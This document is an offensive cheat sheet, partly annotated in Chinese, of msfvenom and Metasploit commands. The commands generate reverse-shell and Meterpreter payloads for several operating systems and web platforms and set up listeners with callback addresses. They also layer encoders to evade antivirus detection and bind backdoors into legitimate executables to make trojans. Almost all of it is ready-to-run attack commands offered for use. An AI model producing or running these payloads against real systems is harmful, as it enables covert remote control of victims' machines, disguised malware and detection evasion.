Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
接受反彈:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.76.132
set LPORT 1111
exploit
具體使用:
生成木馬:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=81.71.25.1 lport=7001 --platform win -f exe -o /home/kali/Desktop/54320.exe
監控:
nc -l -p 7001
或者:
msfconsole
use exploit/multi/handler
//set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.33.143
set LPORT 7001
exploit
msf即Metasploit Framework,可以用來漏洞利用。漏洞探測等功能,是一個非常好的工具
是一個框架,可以改動
-msfvenom -p windows/shell_reverse_tcp lhost=192.168.33.135 lport=7001 -a x86 --platform win -f exe -o a.exe
-p 指定payload路徑
lhost=1.1.1.1 lport=4444 //
-a x86 //操作系統的架構
--platform win //平台,win是windows 平台
-f exe //輸出格式,這里是exe格式輸出
-o //輸出的名字
加密生成shell
msfvenom -p windows/shell/bind_tcp lhost=192.168.33.135 lport=7001 -f raw -e
x86/shikata_ga_nai -i 6 | msfvenom -a x86 --platform windows -e x86/
countdown -i 7 -f raw | msfvenom -a x86 --platform windows -e x86/
shikata_ga_nai -i 9 -b '\x00' -f exe -o b.exe
-f raw 以原始的模式輸出
-e 接加密編碼模塊 -i 接數字加密多少次 | ....再次加密
-b ‘\xoo’ 把\xoo特色字符處理掉
generate -b '\x00\xff' -f exe -o /home/1.exe
把后門綁定在其他模板上:-x
msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/plink.exe lhost=192.168.33.135 lport=7001 -arch x86 --platform win -f exe -o c.exe
直接在linux上運行下面命令生成木馬
普通反彈tcp(shell_reverse_tcp):
msfvenom -p windows/shell_reverse_tcp lhost=81.71.25.1 lport=54322 --platform win -f exe -o /home/kali/Desktop/5432.exe
利用:可以直接用nc連接,或者msf不用設payload
利用反彈meterpreter_tcp/http:
msfvenom -p windows/meterpreter/reverse_tcp lhost=81.71.25.1 lport=54322 --platform win -f exe -o /home/kali/Desktop/54320.exe
使用加密:
msfvenom -p windows/meterpreter/reverse_http lhost=81.71.25.1 lport=54322 -f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -b '\x00' -f exe -o /home/kali/Desktop/meter_http_msfjiami_54322
加密綁定文件(有時候文件無法正常使用):
msfvenom -p windows/meterpreter/reverse_http lhost=81.71.25.1 lport=54322 -f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -b '\x00' -k-x /home/kali/Desktop/key.exe -f exe -o /home/kali/Desktop/54322_key_http_msfjiami.exe
不加密綁定文件:
msfvenom -p windows/meterpreter/reverse_http -k-x /home/kali/Desktop/bing.exe lhost=81.71.25.1 lport=54322 --platform win -f exe -o /home/kali/Desktop/54322_bing.exe
生成源碼:
msfvenom -p windows/meterpreter/reverse_http lhost=81.71.25.1 lport=54322 -f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 15 -f csharp -o /home/kali/Desktop/yuanma.txt